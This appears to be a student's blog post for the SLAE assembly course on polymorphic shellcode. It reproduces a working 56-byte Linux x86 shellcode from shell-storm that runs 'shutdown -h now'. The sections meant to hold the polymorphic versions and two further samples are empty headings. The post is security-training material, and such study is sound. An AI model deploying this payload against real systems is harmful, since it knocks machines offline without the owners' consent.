0x06 SLAE - Polymorphic versions
First sample from shell-storm
Original shellcode
; http://shell-storm.org/shellcode/files/shellcode-876.php
; Title: shutdown -h now Shellcode - 56 bytes
; Date: 2014-06-27
; Platform: linux/x86
; Author: Osanda Malith Jayathissa (@OsandaMalith)
global _start
_start:
xor eax,eax
xor edx,edx
push eax
push 0x682d
mov edi,esp
push eax
push 0x6e
mov WORD [esp+0x1],0x776f
mov edi,esp
push eax
push 0x6e776f64
push 0x74756873
push 0x2f2f2f6e
push 0x6962732f
mov ebx,esp
push edx
push esi
push edi
push ebx
mov ecx,esp
mov al,0xb
int 0x80
Polymorphic shellcode version

Second sample from shell-storm
Original Shellcode
Polymorphic shellcode version
Third sample from shell-storm
Orignal shellcode
Polymorphic shellcode version
Last updated